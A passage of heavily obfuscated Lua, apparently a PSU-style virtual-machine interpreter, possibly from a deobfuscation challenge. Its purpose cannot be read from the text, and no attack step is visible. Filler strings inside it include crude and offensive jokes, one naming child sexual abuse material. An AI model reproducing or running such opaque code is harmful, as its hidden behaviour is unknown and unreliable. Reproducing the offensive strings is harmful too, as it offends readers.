_l_;_l_=_[___l];_ll_=__[_[_l_ll]];__[_l_+1]=_ll_;__[_l_]=_ll_[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[____]))break end while(_l_)/((627-(411+-0x33)))==837 do local __ll;local _l_;__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__ll=__[_[____]];__[_l_+1]=__ll;__[_l_]=__ll[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__ll=__[_[_l_ll]];__[_l_+1]=__ll;__[_l_]=__ll[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[____]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_l_ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__ll=__[_[__lll]];__[_l_+1]=__ll;__[_l_]=__ll[_[_l_l_]];break end;break;end while 2532==(_l_)/((0x1ca9-3685))do _l_=(601205)while __l_l>(171-0x7f)do _l_-= _l_ if not __[_[___l]]then _l=_l+_l__l;else _l=_[__lll];end;break end while(_l_)/((0x533-688))==935 do local _l_;__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];if __[_[_ll_]]then _l=_l+_ll;else _l=_[_l_ll];end;break end;break;end break;end break;end break;end while 1581==(_l_)/(((4472-0x8e9)+-#"mom shot dad"))do _l_=(10210416)while __l_l<=(0xe5-(-#"when is federal going to meet memcorrupt irl"+(-92+0x138)))do _l_-= _l_ _l_=(1471932)while(-120+0xa9)>=__l_l do _l_-= _l_ _l_=(5376540)while __l_l<=(11327/0xf1)do _l_-= _l_ _l_=(3873636)while __l_l>(0x9e-112)do _l_-= _l_ if not __[_[_ll_]]then _l=_l+_l__l;else _l=_[____];end;break end while 2418==(_l_)/((1649+-0x2f))do local __ll;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l];__ll=__[_[____]];__[_l_+1]=__ll;__[_l_]=__ll[__[_[_ll__]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=(_[___ll]~=0);break end;break;end while(_l_)/((26442/0x12))==3660 do _l_=(3478800)while __l_l>(0x90+-96)do _l_-= _l_ __[_[_ll_]]=__[_[___ll]]-__[_[_lll_]];break end while(_l_)/((-80+0x3cc))==3900 do local _=_[_ll_]__[_](_l_l(__,_+_l__l,____l))break end;break;end break;end while 3186==(_l_)/((0x211+-67))do _l_=(3349292)while __l_l<=(160+-0x6d)do _l_-= _l_ _l_=(1109026)while((4118/0x3a)+-#'federal is an asshole')<__l_l do _l_-= _l_ local _l=_[___]local __l,_=_lllll(__[_l](_l_l(__,_l+1,_[____])))____l=_+_l-1 local _=0;for _l=_l,____l do _=_+_ll;__[_l]=__l[_];end;break end while 1783==(_l_)/(((0x5b6-(110600/0x8c))+-#"localplayer not working on server scripts pls help"))do __[_[_l__]][_[__lll]]=_[__ll_];break end;break;end while(_l_)/(((1094+(-#[[stOP READING MY CODE!]]+(-28+0x12)))+-#"i hate noobmaster"))==3202 do _l_=(11856520)while __l_l>(0x3dc/19)do _l_-= _l_ _____[_[__lll]]=__[_[___]];break end while(_l_)/((0x17f7-3115))==3926 do local _l_;__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];break end;break;end break;end break;end while(_l_)/((-36+0xd50))==3028 do _l_=(2172816)while __l_l<=(0x71+-56)do _l_-= _l_ _l_=(4910400)while __l_l<=((0xe7-137)+-#'You have deobuscated the code well done')do _l_-= _l_ _l_=(94872)while __l_l>(6264/0x74)do _l_-= _l_ local __l_l;local ____l;local _l_;__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_l_ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];____l=_[____];__l_l=__[____l]for _=____l+1,_[_l_l_]do __l_l=__l_l..__[_];end;__[_[___]]=__l_l;_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](__[_l_+_l__l])break end while 236==(_l_)/((-0x32+452))do local _=_[_ll_l]__[_](__[_+_l__l])break end;break;end while(_l_)/((-#"still cant find the cum?"+(0xa94-1364)))==3720 do _l_=(11884625)while __l_l>(11480/0xcd)do _l_-= _l_ local _={__,_};_[_ll][_[_l___][_lll]]=_[_l___][_lll_]+_[_l___][__ll];break end while 3875==(_l_)/(((6213-(-#'this challenge was brought to you by bmcq'+(0x54031/109)))+-#'psu is powered by garlic paste'))do local _l_;__[_[_ll_]]();_l=_l+_ll;_=__l[_l];__[_[___l]]=_____[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_____[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_l_ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[____]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__ll]]*__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]][_[__ll]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];_l=_[__ll];break end;break;end break;end while 1528==(_l_)/((0x5ba+-44))do _l_=(58187)while __l_l<=((208-0x81)+-#[[control c, control v]])do _l_-= _l_ _l_=(2128334)while((4794/0x33)+-#"sussy amogus balls in ya mouth kiddo")<__l_l do _l_-= _l_ local _l_;__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_l_ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_llll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];if __[_[___l]]then _l=_l+_ll;else _l=_[_llll];end;break end while(_l_)/(((-0x4d+51089)/36))==1502 do do return __[_[_l__]]end break end;break;end while(_l_)/((0x54-53))==1877 do _l_=(13539334)while(14400/0xf0)<__l_l do _l_-= _l_ __[_[___l]]=__[_[_llll]]%_[_l_l_];break end while 3446==(_l_)/((-91+0xfb4))do local _llll;local _l_;_l_=_[_lll]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___];_llll=__[_[___ll]];__[_l_+1]=_llll;__[_l_]=_llll[__[_[__l__]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];break end;break;end break;end break;end break;end break;end break;end while 3326==(_l_)/(((0x15f9-2847)+-#[[One day ill make the onions cry]]))do _l_=(5596170)while __l_l<=((-103+0xce)+-#[[daddy chill]])do _l_-= _l_ _l_=(8866970)while __l_l<=(267-0xbf)do _l_-= _l_ _l_=(10410491)while(0x60+-28)>=__l_l do _l_-= _l_ _l_=(8853130)while __l_l<=(0x98+((-79+0x13)+-#"Yeah this is getting cringe-"))do _l_-= _l_ _l_=(10071608)while(-0x42+128)>=__l_l do _l_-= _l_ if(__[_[___l]]~=__[_[_ll__]])then _l=_l+_l__l;else _l=_[__ll];end;break;end while 3448==(_l_)/((0x855b3/((267+-0x24)+-#'when is federal going to meet memcorrupt irl')))do _l_=(3298085)while(2646/0x2a)<__l_l do _l_-= _l_ local _ll=_[__lll];local _l=__[_ll]for _=_ll+1,_[__ll_]do _l=_l..__[_];end;__[_[_l__]]=_l;break end while 1955==(_l_)/(((0xd8a-1775)+-#[[sexy]]))do local _llll;local _l_;_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll];_llll=__[_[_l_ll]];__[_l_+1]=_llll;__[_l_]=_llll[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=(_[_l_ll]~=0);break end;break;end break;end while 3322==(_l_)/((386425/0x91))do _l_=(1202019)while __l_l<=(-#'hank hub is skidded wtf!1!1!'+(-49+0x8f))do _l_-= _l_ _l_=(1091168)while(0x14d2/82)<__l_l do _l_-= _l_ local _lll;local _l_;_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___];_lll=__[_[____]];__[_l_+1]=_lll;__[_l_]=_lll[__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=(_[__ll]~=0);break end while 1952==(_l_)/(((0x263+-40)+-#"mer is white"))do local _l_;_l_=_[_ll_l]__[_l_]=__[_l_]()_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];if(__[_[_lll]]~=__[_[_l_l_]])then _l=_l+_l__l;else _l=_[____];end;break end;break;end while 1911==(_l_)/((-0x4b+(-#'sup v 2'+(1467-0x2f4))))do _l_=(11317084)while(-#'real'+(199-0x80))<__l_l do _l_-= _l_ local _=_[___];local _l=__[_];for _=_+1,____l do _l_lll(_l,__[_])end;break end while 3268==(_l_)/((0x1b6a-3555))do if(__[_[___l]]==_[__l__])then _l=_l+_l__l;else _l=_[__ll];end;break end;break;end break;end break;end while 2891==(_l_)/(((0x1c66-(0xeb1+-106))+-#'Bye bye :wave:'))do _l_=(353125)while __l_l<=(-#'Y does my pp grow when i play woth it'+(-0x74+225))do _l_-= _l_ _l_=(4006858)while __l_l<=((-#"win+L = solution"+(443-0xe8))-0x7d)do _l_-= _l_ _l_=(2660350)while(174+-0x69)<__l_l do _l_-= _l_ local _l_l;local _l_;__[_[_l__]]=(_[__lll]~=0);_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];_l_l=__[_[_lll_]];if not _l_l then _l=_l+_l__l;else __[_[_lll]]=_l_l;_l=_[__ll];end;break end while 1925==(_l_)/((-#[[what wally is using]]+(-0x14+1421)))do __l_[_[____]]=__[_[_lll]];_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__l_[_[__ll]]=__[_[_l__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];if(__[_[_l__]]==_[___l_])then _l=_l+_l__l;else _l=_[__ll];end;break end;break;end while 1478==(_l_)/((5532-0xb05))do _l_=(12565682)while(-0x24+107)<__l_l do _l_-= _l_ __[_[_ll_]]=_[_l_ll];break end while(_l_)/(((0xf4329/249)+-#"Broo u/thatHEXdude slapped this server"))==3158 do local ____l;local __l_l;local _l_;__[_[_ll_l]]=_____[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_____[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]][_[__l__]];_l=_l+_ll;_=__l[_l];__l_l=_[__ll];____l=__[__l_l]for _=__l_l+1,_[___l_]do ____l=____l..__[_];end;__[_[___]]=____l;_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[____]))break end;break;end break;end while 3125==(_l_)/((0x141-(0x3740/68)))do _l_=(5808297)while __l_l<=((-0x35+137)+-#"child porn")do _l_-= _l_ _l_=(3920053)while __l_l>(0x68f/23)do _l_-= _l_ __[_[_ll_]][__[_[__lll]]]=__[_[__l__]];break end while 3169==(_l_)/(((0x144d-2642)-0x526))do local _=_[_l__]__[_]=__[_](__[_+_l__l])break end;break;end while 2479==(_l_)/(((4766-0x966)+-#"Use a condom kids"))do _l_=(1747648)while __l_l>(0xfa-175)do _l_-= _l_ local __ll=_l__ll[_[_l_ll]];local _lll;local _ll={};_lll=___l_l({},{__index=function(_l,_)local _=_ll[_];return _[1][_[2]];end,__newindex=function(__,_,_l)local _=_ll[_]_[1][_[2]]=_l;end;});for _l_=1,_[__l__]do _l=_l+_l__l;local _=__l[_l];if _[(0xd4/212)]==157 then _ll[_l_-1]={__,_[_l_ll]};else _ll[_l_-1]={_____,_[_llll]};end;__l_ll[#__l_ll+1]=_ll;end;__[_[___]]=___lll(__ll,_lll,__l_);break end while 448==(_l_)/((-0x2c+3945))do local ___;local _l_;_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];___=__[_[____]];__[_l_+1]=___;__[_l_]=___[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=(_[_l_ll]~=0);break end;break;end break;end break;end break;end while 3215==(_l_)/((5592-0xb12))do _l_=(985280)while __l_l<=((-17+0x71)+-#'cry about it')do _l_-= _l_ _l_=(2642804)while __l_l<=((0x2460/96)+-#'Use a condom kids')do _l_-= _l_ _l_=(210160)while(193+-0x73)>=__l_l do _l_-= _l_ _l_=(986832)while __l_l>(110+-0x21)do _l_-= _l_ local _l_;__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];break end while(_l_)/((-#'Perths Scripting Shit'+(5074-0xa01)))==396 do local _l_;__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];if(__[_[_lll]]==__[_[__ll_]])then _l=_l+_l__l;else _l=_[___ll];end;break end;break;end while 710==(_l_)/((0xf648/(0x219-324)))do _l_=(10128322)while(277-0xc6)<__l_l do _l_-= _l_ __[_[_ll_]]=__[_[____]];break end while(_l_)/((0x1bf3-3637))==2879 do local ____;local ___l;local __lll,_llll;local ___ll;local __l_l;local _l_;_l_=_[_l__];__l_l=_[__ll];for _=_l_,__l_l do __[_]=__llll[_-_l_];end;_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];____l=_l_+_ll_ll-1;for _=_l_,____l do ___ll=__llll[_-_l_];__[_]=___ll;end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__lll,_llll=_lllll(__[_l_](_l_l(__,_l_+_ll,____l)))____l=_llll+_l_-_l__l ___l=0;for _=_l_,____l do ___l=___l+_ll;__[_]=__lll[___l];end;_l=_l+_ll;_=__l[_l];_l_=_[___];____=__[_l_];for _=_l_+1,____l do _l_lll(____,__[_])end;break end;break;end break;end while(_l_)/(((3903-0x7db)+-#[[PSU Deobfuscation Speedrun AnyPrecent WR]]))==1427 do _l_=(5193826)while(-#'troll'+(203+((-10494/0x9f)+-#"im giving 50k to the one who solves this challenge")))>=__l_l do _l_-= _l_ _l_=(13366700)while __l_l>(-0x71+194)do _l_-= _l_ local _l_;local _l_l;__[_[_ll_]]=__[_[_llll]];_l=_l+_ll;_=__l[_l];_l_l=_[_ll_]__[_l_l](__[_l_l+_l__l])_l=_l+_ll;_=__l[_l];__[_[_lll]]=_____[_[_l_ll]];_l=_l+_ll;_=__l[_l];_l_={_,__};_l_[_l___][_l_[_l__l][_l__]]=_l_[_l___][_l_[_ll][__ll]]+_l_[_l__l][__ll_];_l=_l+_ll;_=__l[_l];_____[_[_l_ll]]=__[_[_ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_____[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[____]][_[___l_]];_l=_l+_ll;_=__l[_l];_l_={__,_};_l_[_l__l][_l_[_l___][_l__]]=_l_[_ll][_l_[_l___][___l_]]+_l_[_l__l][_l_[_l___][__ll]];_l=_l+_ll;_=__l[_l];if not __[_[___]]then _l=_l+_l__l;else _l=_[_l_ll];end;break end while 3830==(_l_)/((-74+(7176-0xe1c)))do local ___;local _l_;__[_[_lll]]=_____[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_l_ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];___=__[_[__lll]];__[_l_+1]=___;__[_l_]=___[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];do return end;break end;break;end while(_l_)/((0x1ab0-3455))==1538 do _l_=(6880199)while __l_l>((-0x1c+152)+-#'Penis Sucking Utilities source leak lol!!')do _l_-= _l_ local _=_[_ll_]__[_]=__[_](_l_l(__,_+_ll,____l))break end while 2939==(_l_)/((-#'why do guys only want bitchy bimbos who walk all over them'+(2494+-0x5f)))do local _l_;__[_[_ll_l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];if not __[_[___]]then _l=_l+_l__l;else _l=_[___ll];end;break end;break;end break;end break;end while(_l_)/((6268-0xc75))==320 do _l_=(5475564)while(0x1868/((0x4e60/228)+-#[[Use a condom kids]]))>=__l_l do _l_-= _l_ _l_=(12191963)while __l_l<=(0xff-169)do _l_-= _l_ _l_=(534378)while(((689-0x164)-223)+-#'Federla is good at coding')<__l_l do _l_-= _l_ local _lll;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l];_lll=__[_[_l_ll]];__[_l_+1]=_lll;__[_l_]=_lll[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];break end while 1054==(_l_)/((1043-0x218))do local _l_;__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];if __[_[___l]]then _l=_l+_ll;else _l=_[__ll];end;break end;break;end while(_l_)/((((-11859/0xc9)+3128)+-#'moon 3.1'))==3983 do _l_=(937090)while(-0x74+203)<__l_l do _l_-= _l_ __[_[_ll_]]=_____[_[_l_ll]];break end while(_l_)/((-33+0x1a2))==2434 do local 